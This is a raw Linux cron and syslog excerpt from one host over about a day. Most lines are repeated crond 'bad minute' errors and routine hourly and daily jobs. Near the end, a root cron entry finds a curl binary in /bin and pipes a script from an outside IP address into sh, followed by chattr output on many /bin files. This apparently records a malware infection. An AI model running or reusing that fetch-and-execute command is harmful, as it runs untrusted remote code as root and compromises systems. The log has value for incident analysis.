Mar 31 02:39:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:39:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:39:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:39:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:39:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:39:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:44:01 host-name crond[1006]: (root) RELOAD (/var/spool/cron/root)
Mar 31 02:44:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:44:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:44:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:44:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:44:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:44:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:44:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:44:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:44:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:44:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:44:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:44:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:44:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:44:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:44:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:44:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:44:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:49:01 host-name crond[1006]: (root) RELOAD (/var/spool/cron/root)
Mar 31 02:49:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:49:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:49:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:49:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:49:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:49:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:49:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:49:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:49:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:49:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:49:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:49:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:49:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:49:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:49:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:54:01 host-name crond[1006]: (root) RELOAD (/var/spool/cron/root)
Mar 31 02:54:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:54:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:54:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:54:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:54:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:54:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:54:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:54:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:54:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:54:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:54:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:54:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:54:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:54:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:54:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:54:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:59:01 host-name crond[1006]: (root) RELOAD (/var/spool/cron/root)
Mar 31 02:59:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:59:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:59:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:59:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:59:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:59:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:59:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:59:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:59:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:59:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:59:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:59:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:59:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:59:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:59:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 03:01:01 host-name CROND[27242]: (root) CMD (run-parts /etc/cron.hourly)
Mar 31 03:01:01 host-name run-parts(/etc/cron.hourly)[27242]: starting 0anacron
Mar 31 03:01:01 host-name anacron[27251]: Anacron started on 2020-03-31
Mar 31 03:01:01 host-name anacron[27251]: Will run job `cron.daily' in 34 min.
Mar 31 03:01:01 host-name anacron[27251]: Jobs will be executed sequentially
Mar 31 03:01:01 host-name run-parts(/etc/cron.hourly)[27253]: finished 0anacron
Mar 31 03:04:01 host-name crond[1006]: (root) RELOAD (/var/spool/cron/root)
Mar 31 03:04:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 03:04:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 03:04:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 03:04:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 03:04:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 03:04:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 03:04:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 03:04:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 03:04:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 03:04:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 03:04:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 03:04:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 03:04:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 03:04:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 03:04:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 03:04:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 03:04:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 03:04:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 03:04:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 03:35:01 host-name anacron[27251]: Job `cron.daily' started
Mar 31 03:35:01 host-name run-parts(/etc/cron.daily)[29220]: starting logrotate
Mar 31 03:35:01 host-name run-parts(/etc/cron.daily)[29234]: finished logrotate
Mar 31 03:35:01 host-name run-parts(/etc/cron.daily)[29220]: starting man-db.cron
Mar 31 03:35:01 host-name run-parts(/etc/cron.daily)[29245]: finished man-db.cron
Mar 31 03:35:01 host-name anacron[27251]: Job `cron.daily' terminated (produced output)
Mar 31 03:35:01 host-name anacron[27251]: Can't find sendmail at /usr/sbin/sendmail, not mailing output
Mar 31 03:35:01 host-name anacron[27251]: Normal exit (1 job run)
Mar 31 04:01:01 host-name CROND[30688]: (root) CMD (run-parts /etc/cron.hourly)
Mar 31 04:01:01 host-name run-parts(/etc/cron.hourly)[30688]: starting 0anacron
Mar 31 04:01:01 host-name run-parts(/etc/cron.hourly)[30697]: finished 0anacron
Mar 31 04:24:01 host-name crond[1006]: (root) RELOAD (/var/spool/cron/root)
Mar 31 04:24:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 04:24:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 04:24:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 04:24:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 04:24:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 04:24:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 04:24:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 04:24:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 04:24:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 04:24:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 04:24:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 04:24:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 04:24:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 04:24:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 04:24:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 04:24:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 04:24:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 04:24:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 04:24:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 04:29:01 host-name crond[1006]: (root) RELOAD (/var/spool/cron/root)
Mar 31 04:29:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 04:29:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 04:29:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 04:29:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 04:29:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 04:29:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 04:29:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 04:29:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 04:29:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 04:29:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 04:29:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 04:29:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 04:29:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 04:29:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 04:29:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 04:29:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 04:29:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 04:29:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 04:29:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 04:29:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 04:29:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 04:29:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 04:44:01 host-name crond[1006]: (root) RELOAD (/var/spool/cron/root)
Mar 31 04:44:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 04:44:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 04:44:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 04:44:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 04:44:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 04:44:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 04:44:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 04:44:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 04:44:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 04:44:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 04:44:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 04:44:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 04:44:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 04:44:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 04:44:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 04:44:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 04:44:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 04:44:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 04:44:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 04:44:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 04:44:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 04:44:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 05:01:01 host-name CROND[1854]: (root) CMD (run-parts /etc/cron.hourly)
Mar 31 05:01:01 host-name run-parts(/etc/cron.hourly)[1854]: starting 0anacron
Mar 31 05:01:01 host-name run-parts(/etc/cron.hourly)[1863]: finished 0anacron
Mar 31 06:01:01 host-name CROND[5026]: (root) CMD (run-parts /etc/cron.hourly)
Mar 31 06:01:01 host-name run-parts(/etc/cron.hourly)[5026]: starting 0anacron
Mar 31 06:01:01 host-name run-parts(/etc/cron.hourly)[5035]: finished 0anacron
Mar 31 07:01:01 host-name CROND[8250]: (root) CMD (run-parts /etc/cron.hourly)
Mar 31 07:01:01 host-name run-parts(/etc/cron.hourly)[8250]: starting 0anacron
Mar 31 07:01:01 host-name run-parts(/etc/cron.hourly)[8259]: finished 0anacron
Mar 31 08:01:01 host-name CROND[11690]: (root) CMD (run-parts /etc/cron.hourly)
Mar 31 08:01:01 host-name run-parts(/etc/cron.hourly)[11690]: starting 0anacron
Mar 31 08:01:01 host-name run-parts(/etc/cron.hourly)[11699]: finished 0anacron
Mar 31 09:01:01 host-name CROND[15090]: (root) CMD (run-parts /etc/cron.hourly)
Mar 31 09:01:01 host-name run-parts(/etc/cron.hourly)[15090]: starting 0anacron
Mar 31 09:01:01 host-name run-parts(/etc/cron.hourly)[15099]: finished 0anacron
Mar 31 09:37:01 host-name crond[1006]: (root) RELOAD (/var/spool/cron/root)
Mar 31 09:37:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 09:37:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 09:37:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 09:37:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 09:37:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 09:37:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 09:37:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 09:37:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 09:37:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 09:37:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 09:37:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 09:37:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 09:37:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 09:37:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 09:37:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 09:37:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 09:37:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 09:37:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 09:37:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 09:37:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 09:37:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 09:37:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 09:42:01 host-name crond[1006]: (root) RELOAD (/var/spool/cron/root)
Mar 31 09:42:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 09:42:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 09:42:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 09:42:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 09:42:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 09:42:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 09:42:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 09:42:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 09:42:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 09:42:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 09:42:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 09:42:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 09:42:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 09:42:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 09:42:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 09:42:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 09:42:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 09:42:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 09:42:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 09:42:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 09:42:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 09:42:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 10:01:01 host-name CROND[18414]: (root) CMD (run-parts /etc/cron.hourly)
Mar 31 10:01:01 host-name run-parts(/etc/cron.hourly)[18414]: starting 0anacron
Mar 31 10:01:01 host-name run-parts(/etc/cron.hourly)[18423]: finished 0anacron
Mar 31 11:01:01 host-name CROND[21853]: (root) CMD (run-parts /etc/cron.hourly)
Mar 31 11:01:01 host-name run-parts(/etc/cron.hourly)[21853]: starting 0anacron
Mar 31 11:01:01 host-name run-parts(/etc/cron.hourly)[21862]: finished 0anacron
Mar 31 12:01:01 host-name CROND[25117]: (root) CMD (run-parts /etc/cron.hourly)
Mar 31 12:01:01 host-name run-parts(/etc/cron.hourly)[25117]: starting 0anacron
Mar 31 12:01:01 host-name run-parts(/etc/cron.hourly)[25126]: finished 0anacron
Mar 31 13:01:01 host-name CROND[28359]: (root) CMD (run-parts /etc/cron.hourly)
Mar 31 13:01:01 host-name run-parts(/etc/cron.hourly)[28359]: starting 0anacron
Mar 31 13:01:01 host-name run-parts(/etc/cron.hourly)[28368]: finished 0anacron
Mar 31 14:01:01 host-name CROND[31644]: (root) CMD (run-parts /etc/cron.hourly)
Mar 31 14:01:01 host-name run-parts(/etc/cron.hourly)[31644]: starting 0anacron
Mar 31 14:01:01 host-name run-parts(/etc/cron.hourly)[31653]: finished 0anacron
Mar 31 15:01:01 host-name CROND[2487]: (root) CMD (run-parts /etc/cron.hourly)
Mar 31 15:01:01 host-name run-parts(/etc/cron.hourly)[2487]: starting 0anacron
Mar 31 15:01:01 host-name run-parts(/etc/cron.hourly)[2496]: finished 0anacron
Mar 31 16:01:01 host-name CROND[5764]: (root) CMD (run-parts /etc/cron.hourly)
Mar 31 16:01:01 host-name run-parts(/etc/cron.hourly)[5764]: starting 0anacron
Mar 31 16:01:01 host-name run-parts(/etc/cron.hourly)[5773]: finished 0anacron
Mar 31 16:48:01 host-name crond[1006]: (root) RELOAD (/var/spool/cron/root)
Mar 31 16:48:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 16:48:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 17:01:01 host-name CROND[9180]: (root) CMD (run-parts /etc/cron.hourly)
Mar 31 17:01:01 host-name run-parts(/etc/cron.hourly)[9180]: starting 0anacron
Mar 31 17:01:01 host-name run-parts(/etc/cron.hourly)[9189]: finished 0anacron
Mar 31 18:01:01 host-name CROND[12635]: (root) CMD (run-parts /etc/cron.hourly)
Mar 31 18:01:01 host-name run-parts(/etc/cron.hourly)[12635]: starting 0anacron
Mar 31 18:01:01 host-name run-parts(/etc/cron.hourly)[12644]: finished 0anacron
Mar 31 18:02:01 host-name crond[1006]: (root) RELOAD (/var/spool/cron/root)
Mar 31 18:02:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 18:02:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 19:01:01 host-name CROND[16097]: (root) CMD (run-parts /etc/cron.hourly)
Mar 31 19:01:01 host-name run-parts(/etc/cron.hourly)[16097]: starting 0anacron
Mar 31 19:01:01 host-name run-parts(/etc/cron.hourly)[16106]: finished 0anacron
Mar 31 20:01:01 host-name CROND[20036]: (root) CMD (run-parts /etc/cron.hourly)
Mar 31 20:01:01 host-name run-parts(/etc/cron.hourly)[20036]: starting 0anacron
Mar 31 20:01:01 host-name run-parts(/etc/cron.hourly)[20045]: finished 0anacron
Mar 31 21:01:01 host-name CROND[23930]: (root) CMD (run-parts /etc/cron.hourly)
Mar 31 21:01:01 host-name run-parts(/etc/cron.hourly)[23930]: starting 0anacron
Mar 31 21:01:01 host-name run-parts(/etc/cron.hourly)[23939]: finished 0anacron
Mar 31 22:01:01 host-name CROND[27648]: (root) CMD (run-parts /etc/cron.hourly)
Mar 31 22:01:01 host-name run-parts(/etc/cron.hourly)[27648]: starting 0anacron
Mar 31 22:01:01 host-name run-parts(/etc/cron.hourly)[27657]: finished 0anacron
Mar 31 23:01:01 host-name CROND[31369]: (root) CMD (run-parts /etc/cron.hourly)
Mar 31 23:01:01 host-name run-parts(/etc/cron.hourly)[31369]: starting 0anacron
Mar 31 23:01:01 host-name run-parts(/etc/cron.hourly)[31378]: finished 0anacron
Apr 1 00:01:01 host-name CROND[2838]: (root) CMD (run-parts /etc/cron.hourly)
Apr 1 00:01:01 host-name run-parts(/etc/cron.hourly)[2838]: starting 0anacron
Apr 1 00:01:01 host-name anacron[2847]: Anacron started on 2020-04-01
Apr 1 00:01:01 host-name anacron[2847]: Normal exit (0 jobs run)
Apr 1 00:01:01 host-name run-parts(/etc/cron.hourly)[2849]: finished 0anacron
Apr 1 01:01:01 host-name CROND[6728]: (root) CMD (run-parts /etc/cron.hourly)
Apr 1 01:01:01 host-name run-parts(/etc/cron.hourly)[6728]: starting 0anacron
Apr 1 01:01:01 host-name anacron[6737]: Anacron started on 2020-04-01
Apr 1 01:01:01 host-name anacron[6737]: Normal exit (0 jobs run)
Apr 1 01:01:01 host-name run-parts(/etc/cron.hourly)[6739]: finished 0anacron
Apr 1 02:01:01 host-name CROND[10331]: (root) CMD (run-parts /etc/cron.hourly)
Apr 1 02:01:01 host-name run-parts(/etc/cron.hourly)[10331]: starting 0anacron
Apr 1 02:01:01 host-name anacron[10340]: Anacron started on 2020-04-01
Apr 1 02:01:01 host-name anacron[10340]: Normal exit (0 jobs run)
Apr 1 02:01:01 host-name run-parts(/etc/cron.hourly)[10342]: finished 0anacron
Apr 1 03:01:01 host-name CROND[13580]: (root) CMD (run-parts /etc/cron.hourly)
Apr 1 03:01:01 host-name run-parts(/etc/cron.hourly)[13580]: starting 0anacron
Apr 1 03:01:01 host-name anacron[13589]: Anacron started on 2020-04-01
Apr 1 03:01:01 host-name anacron[13589]: Will run job `cron.daily' in 25 min.
Apr 1 03:01:01 host-name anacron[13589]: Jobs will be executed sequentially
Apr 1 03:01:01 host-name run-parts(/etc/cron.hourly)[13591]: finished 0anacron
Apr 1 03:26:01 host-name anacron[13589]: Job `cron.daily' started
Apr 1 03:26:01 host-name run-parts(/etc/cron.daily)[14933]: starting logrotate
Apr 1 03:26:01 host-name run-parts(/etc/cron.daily)[14947]: finished logrotate
Apr 1 03:26:01 host-name run-parts(/etc/cron.daily)[14933]: starting man-db.cron
Apr 1 03:26:01 host-name run-parts(/etc/cron.daily)[14958]: finished man-db.cron
Apr 1 03:26:01 host-name anacron[13589]: Job `cron.daily' terminated (produced output)
Apr 1 03:26:01 host-name anacron[13589]: Can't find sendmail at /usr/sbin/sendmail, not mailing output
Apr 1 03:26:01 host-name anacron[13589]: Normal exit (1 job run)
Apr 1 04:01:01 host-name CROND[16901]: (root) CMD (run-parts /etc/cron.hourly)
Apr 1 04:01:01 host-name run-parts(/etc/cron.hourly)[16901]: starting 0anacron
Apr 1 04:01:01 host-name run-parts(/etc/cron.hourly)[16910]: finished 0anacron
Apr 1 04:54:01 host-name crond[1006]: (root) RELOAD (/var/spool/cron/root)
Apr 1 04:54:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Apr 1 04:54:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Apr 1 04:59:01 host-name crond[1006]: (root) RELOAD (/var/spool/cron/root)
Apr 1 04:59:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Apr 1 04:59:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Apr 1 05:01:01 host-name CROND[20137]: (root) CMD (run-parts /etc/cron.hourly)
Apr 1 05:01:01 host-name run-parts(/etc/cron.hourly)[20137]: starting 0anacron
Apr 1 05:01:01 host-name run-parts(/etc/cron.hourly)[20146]: finished 0anacron
Apr 1 06:01:01 host-name CROND[23401]: (root) CMD (run-parts /etc/cron.hourly)
Apr 1 06:01:01 host-name run-parts(/etc/cron.hourly)[23401]: starting 0anacron
Apr 1 06:01:01 host-name run-parts(/etc/cron.hourly)[23410]: finished 0anacron
Apr 1 06:11:01 host-name crond[1006]: (root) RELOAD (/var/spool/cron/root)
Apr 1 06:11:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Apr 1 06:11:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Apr 1 06:11:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Apr 1 06:11:01 host-name CROND[23966]: (root) CMD (for f in /bin/*;do strings $f|grep -q curl.debug&&break;done;$f -fsSL http://58.48.54.152:85/ini.sh | sh)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/apropos)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/audit2why)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/awk)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/bashbug)
Apr 1 06:11:26 host-name CROND[23965]: (root) CMDOUT (/bin/chattr: Operation not supported while reading flags on /bin/captoinfo)
